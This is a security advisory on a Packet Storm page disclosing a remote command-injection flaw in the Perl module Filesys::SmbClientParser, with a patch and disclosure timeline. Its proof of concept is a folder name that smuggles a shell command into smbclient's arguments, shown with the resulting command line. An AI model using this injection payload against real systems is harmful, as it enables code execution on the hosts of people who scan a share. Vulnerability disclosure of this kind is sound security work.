what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

smbclientparser-exec.txt

smbclientparser-exec.txt
Posted Jul 18, 2008
Authored by Jesus Olmos Gonzalez

The SmbClientParser perl module suffers from a vulnerability that allows for remote command execution.

tags | exploit, remote, perl
SHA-256 | 33334045f42d73fb46e9185faa3bbbcd3ff495de9f3d275a493a514453021afd

smbclientparser-exec.txt

Change Mirror Download
=============================================
INTERNET SECURITY AUDITORS ALERT 2006-006
- Original release date: February 28, 2006
- Last revised: July 18th, 2008
- Discovered by: Jesus Olmos Gonzalez
- Severity: 5/5
=============================================

I. VULNERABILITY
-------------------------
SmbClientParser perl module allows remote command execution.

II. BACKGROUND
-------------------------
SmbClientParser is a useful perl module to writing Netbios interactive
codes, is a wraper from linux smbclient command and can be downloaded
from:
http://search.cpan.org/~alian/Filesys-SmbClientParser-2.7/SmbClientParser.pm

or installed:
perl -MCPAN -e shell
install Filesys::SmbClientParser

III. DESCRIPTION
-------------------------
If a host scans your shared folder whith a tool that uses this module,
you can execute shell commands in his host.

This module has the following snippet of code:

my @var = `$pargs`;

pargs it is parsed with the following poor filters:

my $pargs;
if ($args=~/^([^;]*)$/) { # no ';' nickel
$pargs=$1;
} elsif ($smbscript) { # ';' is allowed inside -c ' '
if ($args=~/^([^;]* -c '[^']*'[^;]*)$/) {
$pargs=$1;
} else { # what that ?
die("Why a ';' here ? => $args");
}
} else { die("Why a ';' here ? => $args"); }

If thereis a folder inside a shared folder with the following name:

' x && xterm &#

The perl will spawn an xterm :)
Note that this was reported at 2006 and no answer received, be
carefoul with cpan modules.

IV. PROOF OF CONCEPT
-------------------------
This folder name inside the shared folder:

' x && xterm &#

Will execute the following:
/usr/bin/smbclient "//x.x.x.x/vulns" -U "user%pass" -d0 -c 'cd "'
x && xterm &#"' -D "/poc"

This proof of concept spawns a xterm at vyctims xwindow, replace xterm
for the evilcommands.

V. BUSINESS IMPACT
-------------------------
-

VI. SYSTEMS AFFECTED
-------------------------
Versions up to 2.7 included (all)

VII. SOLUTION
-------------------------
Use this patch:

138a139,146
>
#------------------------------------------------------------------------------
> # Sanitize (jolmos[@]isecauditors[.]com)
>
#------------------------------------------------------------------------------
> sub Sanitize {
> my $danger = $_[0]; #There are many danger bytes,
but if the
> $$danger =~ s/\n|\r|'|"|//ig; #danger string is inside ""
or '' the only
> #option is break with ' or "
or \r or \n
> }
265a274
> foreach my $i (@_) { &Sanitize(\$i); }
287a297
> foreach my $i (@_) { &Sanitize(\$i); }
321a332
> foreach my $i (@_) { &Sanitize(\$i); }
331a343
> foreach my $i (@_) { &Sanitize(\$i); }
345a358
> foreach my $i (@_) { &Sanitize(\$i); }
359a373
> foreach my $i (@_) { &Sanitize(\$i); }
373a388
> foreach my $i (@_) { &Sanitize(\$i); }
375a391
>
387a404
> foreach my $i (@_) { &Sanitize(\$i); }
398a416
> foreach my $i (@_) { &Sanitize(\$i); }
409a428
> foreach my $i (@_) { &Sanitize(\$i); }
487a507
> foreach my $i (@_) { &Sanitize(\$i); }

VIII. REFERENCES
-------------------------
http://search.cpan.org/~alian/Filesys-SmbClientParser-2.7/

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported by Jesus Olmos
Gonzalez (jolmos (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
April 26, 2006: Initial release.
July 14, 2008: Patch added.
July 18, 2008: Published.

XI. DISCLOSURE TIMELINE
-------------------------
February 26, 2006: The vulnerability discovered by
Internet Security Auditors.
April 26, 2006: Initial vendor notification sent.
September 14, 2006: Second notification: correction in one week.
No correction.
December 2, 2006: Third notification: no response.
January 18, 2007: Forth notification: no response.
May 1, 2007: Fifth notification: no response.
November 11, 2007: Sixth notification: no response.
July 14, 2008: Seventh notification: no response from the
developer (Alain Barbet), we wrote the patch.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.
Login or Register to add favorites

File Archive:

July 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    52 Files
  • 2
    Jul 2nd
    0 Files
  • 3
    Jul 3rd
    0 Files
  • 4
    Jul 4th
    0 Files
  • 5
    Jul 5th
    0 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    0 Files
  • 9
    Jul 9th
    0 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close